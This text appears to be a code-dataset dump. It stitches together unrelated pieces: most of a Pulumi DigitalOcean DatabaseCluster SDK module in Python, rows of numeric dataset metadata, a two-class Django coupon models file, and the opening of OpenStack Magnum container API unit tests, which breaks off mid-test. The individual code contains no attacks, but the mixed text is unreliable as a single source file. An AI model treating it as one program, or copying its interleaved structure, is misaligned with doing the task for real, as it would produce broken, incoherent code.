:param pulumi.Input[int] port: Network port that the database cluster is listening on.
:param pulumi.Input[str] private_host: Same as `host`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] private_uri: Same as `uri`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] uri: The full URI for connecting to the database cluster.
:param pulumi.Input[str] user: Username for the cluster's default user.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
if cluster_urn is not None:
pulumi.set(__self__, "cluster_urn", cluster_urn)
if database is not None:
pulumi.set(__self__, "database", database)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if eviction_policy is not None:
pulumi.set(__self__, "eviction_policy", eviction_policy)
if host is not None:
pulumi.set(__self__, "host", host)
if maintenance_windows is not None:
pulumi.set(__self__, "maintenance_windows", maintenance_windows)
if name is not None:
pulumi.set(__self__, "name", name)
if node_count is not None:
pulumi.set(__self__, "node_count", node_count)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if private_host is not None:
pulumi.set(__self__, "private_host", private_host)
if private_network_uuid is not None:
pulumi.set(__self__, "private_network_uuid", private_network_uuid)
if private_uri is not None:
pulumi.set(__self__, "private_uri", private_uri)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if sql_mode is not None:
pulumi.set(__self__, "sql_mode", sql_mode)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if uri is not None:
pulumi.set(__self__, "uri", uri)
if user is not None:
pulumi.set(__self__, "user", user)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="clusterUrn")
def cluster_urn(self) -> Optional[pulumi.Input[str]]:
"""
The uniform resource name of the database cluster.
"""
return pulumi.get(self, "cluster_urn")
@cluster_urn.setter
def cluster_urn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_urn", value)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster's default database.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> Optional[pulumi.Input[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@eviction_policy.setter
def eviction_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eviction_policy", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Database cluster's hostname.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@maintenance_windows.setter
def maintenance_windows(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DatabaseClusterMaintenanceWindowArgs']]]]):
pulumi.set(self, "maintenance_windows", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> Optional[pulumi.Input[int]]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@node_count.setter
def node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "node_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password for the cluster's default user.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Network port that the database cluster is listening on.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="privateHost")
def private_host(self) -> Optional[pulumi.Input[str]]:
"""
Same as `host`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_host")
@private_host.setter
def private_host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_host", value)
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@private_network_uuid.setter
def private_network_uuid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_network_uuid", value)
@property
@pulumi.getter(name="privateUri")
def private_uri(self) -> Optional[pulumi.Input[str]]:
"""
Same as `uri`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_uri")
@private_uri.setter
def private_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_uri", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[Union[str, 'Region']]]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[Union[str, 'Region']]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[Union[str, 'DatabaseSlug']]]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> Optional[pulumi.Input[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@sql_mode.setter
def sql_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_mode", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def uri(self) -> Optional[pulumi.Input[str]]:
"""
The full URI for connecting to the database cluster.
"""
return pulumi.get(self, "uri")
@uri.setter
def uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uri", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Username for the cluster's default user.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
class DatabaseCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a DigitalOcean database cluster resource.
## Example Usage
### Create a new PostgreSQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="11")
```
### Create a new MySQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mysql_example = digitalocean.DatabaseCluster("mysql-example",
engine="mysql",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="8")
```
### Create a new Redis database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
redis_example = digitalocean.DatabaseCluster("redis-example",
engine="redis",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="6")
```
### Create a new MongoDB database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mongodb_example = digitalocean.DatabaseCluster("mongodb-example",
engine="mongodb",
node_count=1,
region="nyc3",
size="db-s-1vcpu-1gb",
version="4")
```
## Import
Database clusters can be imported using the `id` returned from DigitalOcean, e.g.
```sh
$ pulumi import digitalocean:index/databaseCluster:DatabaseCluster mycluster 245bcfd0-7f31-4ce6-a2bc-475a116cca97
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DatabaseClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a DigitalOcean database cluster resource.
## Example Usage
### Create a new PostgreSQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
postgres_example = digitalocean.DatabaseCluster("postgres-example",
engine="pg",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="11")
```
### Create a new MySQL database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mysql_example = digitalocean.DatabaseCluster("mysql-example",
engine="mysql",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="8")
```
### Create a new Redis database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
redis_example = digitalocean.DatabaseCluster("redis-example",
engine="redis",
node_count=1,
region="nyc1",
size="db-s-1vcpu-1gb",
version="6")
```
### Create a new MongoDB database cluster
```python
import pulumi
import pulumi_digitalocean as digitalocean
mongodb_example = digitalocean.DatabaseCluster("mongodb-example",
engine="mongodb",
node_count=1,
region="nyc3",
size="db-s-1vcpu-1gb",
version="4")
```
## Import
Database clusters can be imported using the `id` returned from DigitalOcean, e.g.
```sh
$ pulumi import digitalocean:index/databaseCluster:DatabaseCluster mycluster 245bcfd0-7f31-4ce6-a2bc-475a116cca97
```
:param str resource_name: The name of the resource.
:param DatabaseClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DatabaseClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DatabaseClusterArgs.__new__(DatabaseClusterArgs)
if engine is None and not opts.urn:
raise TypeError("Missing required property 'engine'")
__props__.__dict__["engine"] = engine
__props__.__dict__["eviction_policy"] = eviction_policy
__props__.__dict__["maintenance_windows"] = maintenance_windows
__props__.__dict__["name"] = name
if node_count is None and not opts.urn:
raise TypeError("Missing required property 'node_count'")
__props__.__dict__["node_count"] = node_count
__props__.__dict__["private_network_uuid"] = private_network_uuid
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
if size is None and not opts.urn:
raise TypeError("Missing required property 'size'")
__props__.__dict__["size"] = size
__props__.__dict__["sql_mode"] = sql_mode
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
__props__.__dict__["cluster_urn"] = None
__props__.__dict__["database"] = None
__props__.__dict__["host"] = None
__props__.__dict__["password"] = None
__props__.__dict__["port"] = None
__props__.__dict__["private_host"] = None
__props__.__dict__["private_uri"] = None
__props__.__dict__["uri"] = None
__props__.__dict__["user"] = None
super(DatabaseCluster, __self__).__init__(
'digitalocean:index/databaseCluster:DatabaseCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_urn: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
engine: Optional[pulumi.Input[str]] = None,
eviction_policy: Optional[pulumi.Input[str]] = None,
host: Optional[pulumi.Input[str]] = None,
maintenance_windows: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
node_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
private_host: Optional[pulumi.Input[str]] = None,
private_network_uuid: Optional[pulumi.Input[str]] = None,
private_uri: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[Union[str, 'Region']]] = None,
size: Optional[pulumi.Input[Union[str, 'DatabaseSlug']]] = None,
sql_mode: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
uri: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None) -> 'DatabaseCluster':
"""
Get an existing DatabaseCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_urn: The uniform resource name of the database cluster.
:param pulumi.Input[str] database: Name of the cluster's default database.
:param pulumi.Input[str] engine: Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
:param pulumi.Input[str] eviction_policy: A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
:param pulumi.Input[str] host: Database cluster's hostname.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseClusterMaintenanceWindowArgs']]]] maintenance_windows: Defines when the automatic maintenance should be performed for the database cluster.
:param pulumi.Input[str] name: The name of the database cluster.
:param pulumi.Input[int] node_count: Number of nodes that will be included in the cluster.
:param pulumi.Input[str] password: Password for the cluster's default user.
:param pulumi.Input[int] port: Network port that the database cluster is listening on.
:param pulumi.Input[str] private_host: Same as `host`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[str] private_network_uuid: The ID of the VPC where the database cluster will be located.
:param pulumi.Input[str] private_uri: Same as `uri`, but only accessible from resources within the account and in the same region.
:param pulumi.Input[Union[str, 'Region']] region: DigitalOcean region where the cluster will reside.
:param pulumi.Input[Union[str, 'DatabaseSlug']] size: Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
:param pulumi.Input[str] sql_mode: A comma separated string specifying the SQL modes for a MySQL cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tag names to be applied to the database cluster.
:param pulumi.Input[str] uri: The full URI for connecting to the database cluster.
:param pulumi.Input[str] user: Username for the cluster's default user.
:param pulumi.Input[str] version: Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DatabaseClusterState.__new__(_DatabaseClusterState)
__props__.__dict__["cluster_urn"] = cluster_urn
__props__.__dict__["database"] = database
__props__.__dict__["engine"] = engine
__props__.__dict__["eviction_policy"] = eviction_policy
__props__.__dict__["host"] = host
__props__.__dict__["maintenance_windows"] = maintenance_windows
__props__.__dict__["name"] = name
__props__.__dict__["node_count"] = node_count
__props__.__dict__["password"] = password
__props__.__dict__["port"] = port
__props__.__dict__["private_host"] = private_host
__props__.__dict__["private_network_uuid"] = private_network_uuid
__props__.__dict__["private_uri"] = private_uri
__props__.__dict__["region"] = region
__props__.__dict__["size"] = size
__props__.__dict__["sql_mode"] = sql_mode
__props__.__dict__["tags"] = tags
__props__.__dict__["uri"] = uri
__props__.__dict__["user"] = user
__props__.__dict__["version"] = version
return DatabaseCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterUrn")
def cluster_urn(self) -> pulumi.Output[str]:
"""
The uniform resource name of the database cluster.
"""
return pulumi.get(self, "cluster_urn")
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
Name of the cluster's default database.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter
def engine(self) -> pulumi.Output[str]:
"""
Database engine used by the cluster (ex. `pg` for PostreSQL, `mysql` for MySQL, `redis` for Redis, or `mongodb` for MongoDB).
"""
return pulumi.get(self, "engine")
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> pulumi.Output[Optional[str]]:
"""
A string specifying the eviction policy for a Redis cluster. Valid values are: `noeviction`, `allkeys_lru`, `allkeys_random`, `volatile_lru`, `volatile_random`, or `volatile_ttl`.
"""
return pulumi.get(self, "eviction_policy")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
Database cluster's hostname.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter(name="maintenanceWindows")
def maintenance_windows(self) -> pulumi.Output[Optional[Sequence['outputs.DatabaseClusterMaintenanceWindow']]]:
"""
Defines when the automatic maintenance should be performed for the database cluster.
"""
return pulumi.get(self, "maintenance_windows")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the database cluster.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nodeCount")
def node_count(self) -> pulumi.Output[int]:
"""
Number of nodes that will be included in the cluster.
"""
return pulumi.get(self, "node_count")
@property
@pulumi.getter
def password(self) -> pulumi.Output[str]:
"""
Password for the cluster's default user.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Network port that the database cluster is listening on.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="privateHost")
def private_host(self) -> pulumi.Output[str]:
"""
Same as `host`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_host")
@property
@pulumi.getter(name="privateNetworkUuid")
def private_network_uuid(self) -> pulumi.Output[str]:
"""
The ID of the VPC where the database cluster will be located.
"""
return pulumi.get(self, "private_network_uuid")
@property
@pulumi.getter(name="privateUri")
def private_uri(self) -> pulumi.Output[str]:
"""
Same as `uri`, but only accessible from resources within the account and in the same region.
"""
return pulumi.get(self, "private_uri")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
DigitalOcean region where the cluster will reside.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def size(self) -> pulumi.Output[str]:
"""
Database Droplet size associated with the cluster (ex. `db-s-1vcpu-1gb`). See here for a [list of valid size slugs](https://docs.digitalocean.com/reference/api/api-reference/#tag/Databases).
"""
return pulumi.get(self, "size")
@property
@pulumi.getter(name="sqlMode")
def sql_mode(self) -> pulumi.Output[Optional[str]]:
"""
A comma separated string specifying the SQL modes for a MySQL cluster.
"""
return pulumi.get(self, "sql_mode")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tag names to be applied to the database cluster.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def uri(self) -> pulumi.Output[str]:
"""
The full URI for connecting to the database cluster.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter
def user(self) -> pulumi.Output[str]:
"""
Username for the cluster's default user.
"""
return pulumi.get(self, "user")
@property
@pulumi.getter
def version(self) -> pulumi.Output[Optional[str]]:
"""
Engine version used by the cluster (ex. `11` for PostgreSQL 11).
"""
return pulumi.get(self, "version")
| 43.433031
| 252
| 0.636787
| 5,059
| 43,129
| 5.253212
| 0.05001
| 0.093957
| 0.074278
| 0.068709
| 0.90085
| 0.876881
| 0.843505
| 0.825105
| 0.817429
| 0.792106
| 0
| 0.003742
| 0.250272
| 43,129
| 992
| 253
| 43.476815
| 0.818154
| 0.356836
| 0
| 0.688433
| 1
| 0
| 0.099565
| 0.016508
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166045
| false
| 0.026119
| 0.014925
| 0
| 0.283582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c01900793d8d4bd020a362d9e6a3ce77b4b3d4fa
| 118
|
py
|
Python
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2019-04-20T16:58:02.000Z
|
2019-04-20T16:58:02.000Z
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 6
|
2020-06-05T19:57:58.000Z
|
2021-09-08T00:49:17.000Z
|
apps/coupon/models.py
|
jakejie/ShopPro
|
f0cec134ae77f4449f15a0219123d6a6bce2aad2
|
[
"Apache-2.0"
] | 1
|
2021-09-10T18:29:28.000Z
|
2021-09-10T18:29:28.000Z
|
from django.db import models
class SystemCoupon(models.Model):
pass
class StoreCoupon(models.Model):
pass
| 11.8
| 33
| 0.737288
| 15
| 118
| 5.8
| 0.666667
| 0.252874
| 0.344828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186441
| 118
| 9
| 34
| 13.111111
| 0.90625
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
c0460a6773ed1087a9f3340e96f25b8e9017b58e
| 27,374
|
py
|
Python
|
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/unit/api/controllers/v1/test_container.py
|
mjbrewer/testIndex
|
420dc071d4240a89b6f266e8d2575cedb39bfea0
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from magnum.common import utils as comm_utils
from magnum import objects
from magnum.objects import fields
from magnum.tests.unit.api import base as api_base
from magnum.tests.unit.db import utils
from oslo_policy import policy
import mock
from mock import patch
from webtest.app import AppError
class TestContainerController(api_base.FunctionalTest):
def setUp(self):
super(TestContainerController, self).setUp()
p = patch('magnum.objects.Bay.get_by_uuid')
self.mock_bay_get_by_uuid = p.start()
self.addCleanup(p.stop)
p = patch('magnum.objects.BayModel.get_by_uuid')
self.mock_baymodel_get_by_uuid = p.start()
self.addCleanup(p.stop)
def fake_get_by_uuid(context, uuid):
return objects.Bay(self.context, **utils.get_test_bay(uuid=uuid))
self.mock_bay_get_by_uuid.side_effect = fake_get_by_uuid
self.mock_baymodel_get_by_uuid.return_value.coe = 'swarm'
@patch('magnum.conductor.api.API.container_create')
def test_create_container(self, mock_container_create):
mock_container_create.side_effect = lambda x: x
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_create')
def test_create_container_set_project_id_and_user_id(
self, mock_container_create):
def _create_side_effect(container):
self.assertEqual(container.project_id, self.context.project_id)
self.assertEqual(container.user_id, self.context.user_id)
return container
mock_container_create.side_effect = _create_side_effect
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
self.app.post('/v1/containers',
params=params,
content_type='application/json')
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.conductor.api.API.container_create')
@patch('magnum.conductor.api.API.container_delete')
def test_create_container_with_command(self,
mock_container_delete,
mock_container_create,
mock_container_show):
mock_container_create.side_effect = lambda x: x
# Create a container with a command
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
'"bay_uuid": "fff114da-3bfa-4a0f-a123-c0dffad9718e"}')
response = self.app.post('/v1/containers',
params=params,
content_type='application/json')
self.assertEqual(response.status_int, 201)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Stopped'
mock_container_show.return_value = container
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
self.assertEqual(1, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('My Docker', c.get('name'))
self.assertEqual('env', c.get('command'))
self.assertEqual('Stopped', c.get('status'))
# Delete the container we created
response = self.app.delete('/v1/containers/%s' % c.get('uuid'))
self.assertEqual(response.status_int, 204)
response = self.app.get('/v1/containers')
self.assertEqual(response.status_int, 200)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('magnum.conductor.api.API.container_show')
@patch('magnum.conductor.api.API.container_create')
@patch('magnum.conductor.api.API.container_delete')
def test_create_container_with_bay_uuid(self,
mock_container_delete,
mock_container_create,
mock_container_show):
mock_container_create.side_effect = lambda x: x
# Create a container with a command
params = ('{"name": "My Docker", "image": "ubuntu",'
'"command": "env",'
